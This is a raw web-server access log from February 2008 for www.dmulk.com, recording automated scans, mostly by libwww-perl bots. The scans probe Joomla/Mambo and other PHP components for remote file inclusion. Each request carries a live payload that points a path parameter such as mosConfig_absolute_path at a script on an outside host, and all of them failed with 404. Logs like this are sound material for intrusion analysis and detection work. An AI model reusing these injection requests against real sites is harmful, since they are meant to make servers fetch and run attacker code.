62.168.15.147 - - [12/Feb/2008:11:43:41 -0800] "GET /logs/access_080108.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:11:43:42 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:11:43:42 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:11:43:49 -0800] "GET /logs/access_080131.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.151.23.4 - - [12/Feb/2008:11:43:53 -0800] "GET /logs/access.log//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.151.23.4 - - [12/Feb/2008:11:43:53 -0800] "GET //index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.151.23.4 - - [12/Feb/2008:11:43:54 -0800] "GET /logs//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:11:44:15 -0800] "GET /index.php?option=com_cropimage&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.105.35.14 - - [12/Feb/2008:11:44:20 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.contactoefectivo.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.105.35.14 - - [12/Feb/2008:11:44:20 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.contactoefectivo.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.105.35.14 - - [12/Feb/2008:11:44:21 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.contactoefectivo.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.151.23.4 - - [12/Feb/2008:11:44:36 -0800] "GET /logs/access_080105.log//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.161.218 - - [12/Feb/2008:11:44:46 -0800] "GET /index3.php?dir=? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.196.84 - - [12/Feb/2008:11:45:16 -0800] "GET /logs/access_080122.log/mambots/content/multithumb/multithumb?mosConfig_absolute_path=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.196.84 - - [12/Feb/2008:11:45:16 -0800] "GET /logs/mambots/content/multithumb/multithumb?mosConfig_absolute_path=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:11:45:30 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:11:48:14 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:11:48:17 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:11:48:28 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:11:48:34 -0800] "GET /index.php?option=com_cropimage&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.124.24 - - [12/Feb/2008:11:48:34 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.124.24 - - [12/Feb/2008:11:48:35 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.124.24 - - [12/Feb/2008:11:48:35 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.35.14 - - [12/Feb/2008:11:49:39 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.contactoefectivo.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.124.24 - - [12/Feb/2008:11:51:09 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.126.206.70 - - [12/Feb/2008:11:51:15 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://adyswebpage.3x.ro/b? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
194.126.206.70 - - [12/Feb/2008:11:51:16 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebtown.com/acc827/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
140.203.56.30 - - [12/Feb/2008:11:51:17 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://adyswebpage.3x.ro/b? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
140.203.56.30 - - [12/Feb/2008:11:51:17 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebtown.com/acc827/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
140.203.56.30 - - [12/Feb/2008:11:51:17 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://adyswebpage.3x.ro/b? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
210.211.255.3 - - [12/Feb/2008:11:51:17 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.203.56.30 - - [12/Feb/2008:11:51:18 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebtown.com/acc827/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
194.126.206.70 - - [12/Feb/2008:11:51:18 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://adyswebpage.3x.ro/b? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
194.126.206.70 - - [12/Feb/2008:11:51:18 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebtown.com/acc827/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
210.211.255.3 - - [12/Feb/2008:11:51:19 -0800] "GET //skin/zero_vote/error.php?dir=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.211.255.3 - - [12/Feb/2008:11:51:20 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.91.145.249 - - [12/Feb/2008:11:51:51 -0800] "GET /logs/access_080108.log//tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/d.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [12/Feb/2008:11:51:51 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/d.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [12/Feb/2008:11:51:51 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/d.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.196.84 - - [12/Feb/2008:11:52:03 -0800] "GET /logs/access_071221.log/mambots/content/multithumb/multithumb?mosConfig_absolute_path=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.67.82 - - [12/Feb/2008:11:52:23 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [12/Feb/2008:11:52:24 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [12/Feb/2008:11:52:28 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.151.23.4 - - [12/Feb/2008:11:52:52 -0800] "GET /logs/access.log//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.151.23.4 - - [12/Feb/2008:11:52:52 -0800] "GET //index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.151.23.4 - - [12/Feb/2008:11:52:53 -0800] "GET /logs//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.25.2 - - [12/Feb/2008:11:53:10 -0800] "GET /logs/access.log//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.25.2 - - [12/Feb/2008:11:53:10 -0800] "GET //index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.25.2 - - [12/Feb/2008:11:53:11 -0800] "GET /logs//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.151.23.4 - - [12/Feb/2008:11:53:33 -0800] "GET /logs/access_080105.log//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.25.2 - - [12/Feb/2008:11:53:51 -0800] "GET /logs/access_080105.log//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.182 - - [12/Feb/2008:11:54:04 -0800] "GET /index.php?option=com_cropimage&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.53.138.162 - - [12/Feb/2008:11:54:10 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.53.138.162 - - [12/Feb/2008:11:54:10 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.53.138.162 - - [12/Feb/2008:11:54:10 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.217.247.166 - - [12/Feb/2008:11:54:15 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [12/Feb/2008:11:54:16 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [12/Feb/2008:11:54:21 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.26.1.243 - - [12/Feb/2008:11:54:52 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.26.1.243 - - [12/Feb/2008:11:54:53 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.26.1.243 - - [12/Feb/2008:11:54:53 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.189.208.72 - - [12/Feb/2008:11:55:05 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://adyswebpage.3x.ro/b? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
218.189.208.72 - - [12/Feb/2008:11:55:05 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebtown.com/acc827/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
218.189.208.72 - - [12/Feb/2008:11:55:05 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://adyswebpage.3x.ro/b? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
218.189.208.72 - - [12/Feb/2008:11:55:06 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebtown.com/acc827/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:11:55:20 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:11:55:21 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:11:55:23 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [12/Feb/2008:11:56:06 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [12/Feb/2008:11:56:06 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [12/Feb/2008:11:56:06 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.174.136 - - [12/Feb/2008:11:56:32 -0800] "GET /administrator/components/com_glossary/admin.glossary.php?mosConfig_absolute_path=http://www.surproyecto.com.ar/mc.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.174.136 - - [12/Feb/2008:11:56:39 -0800] "GET /logs/access_080131.log/administrator/components/com_glossary/admin.glossary.php?mosConfig_absolute_path=http://www.surproyecto.com.ar/mc.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.174.136 - - [12/Feb/2008:11:56:40 -0800] "GET /administrator/components/com_glossary/admin.glossary.php?mosConfig_absolute_path=http://www.surproyecto.com.ar/mc.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.174.136 - - [12/Feb/2008:11:56:40 -0800] "GET /logs/administrator/components/com_glossary/admin.glossary.php?mosConfig_absolute_path=http://www.surproyecto.com.ar/mc.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:11:57:07 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:11:57:09 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:11:57:11 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:11:57:40 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:11:57:44 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:11:57:48 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.177.157.209 - - [12/Feb/2008:11:57:49 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://adyswebpage.3x.ro/b? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
210.177.157.209 - - [12/Feb/2008:11:57:49 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://adyswebpage.3x.ro/b? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
210.177.157.209 - - [12/Feb/2008:11:57:49 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebtown.com/acc827/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
210.177.157.209 - - [12/Feb/2008:11:57:49 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebtown.com/acc827/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
199.216.35.5 - - [12/Feb/2008:11:58:03 -0800] "GET /index.php?option=com_cropimage&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:11:58:10 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:11:58:18 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:11:58:21 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.38.152.250 - - [12/Feb/2008:11:58:31 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://adyswebpage.3x.ro/b? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
202.38.152.250 - - [12/Feb/2008:11:58:32 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebtown.com/acc827/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:11:58:34 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:11:58:36 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.38.152.250 - - [12/Feb/2008:11:58:37 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://adyswebpage.3x.ro/b? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:11:58:37 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.38.152.250 - - [12/Feb/2008:11:58:38 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebtown.com/acc827/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
74.53.40.2 - - [12/Feb/2008:11:59:07 -0800] "GET /logs/access_080121.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://ns30794.ovh.net/~ambafranM/local/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.40.2 - - [12/Feb/2008:11:59:07 -0800] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://ns30794.ovh.net/~ambafranM/local/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.40.2 - - [12/Feb/2008:11:59:07 -0800] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://ns30794.ovh.net/~ambafranM/local/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.146.33.210 - - [12/Feb/2008:11:59:53 -0800] "GET /logs/index.php?option=com_find_us&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
82.146.33.210 - - [12/Feb/2008:11:59:54 -0800] "GET /index.php?option=com_find_us&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
210.53.138.162 - - [12/Feb/2008:12:00:00 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.20.40.147 - - [12/Feb/2008:12:00:07 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://adyswebpage.3x.ro/b? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
64.20.40.147 - - [12/Feb/2008:12:00:07 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://adyswebpage.3x.ro/b? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
64.20.40.147 - - [12/Feb/2008:12:00:15 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebtown.com/acc827/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.20.40.147 - - [12/Feb/2008:12:00:15 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebtown.com/acc827/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:12:01:33 -0800] "GET /logs/access_080131.log/index.php?option=com_cropimage&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
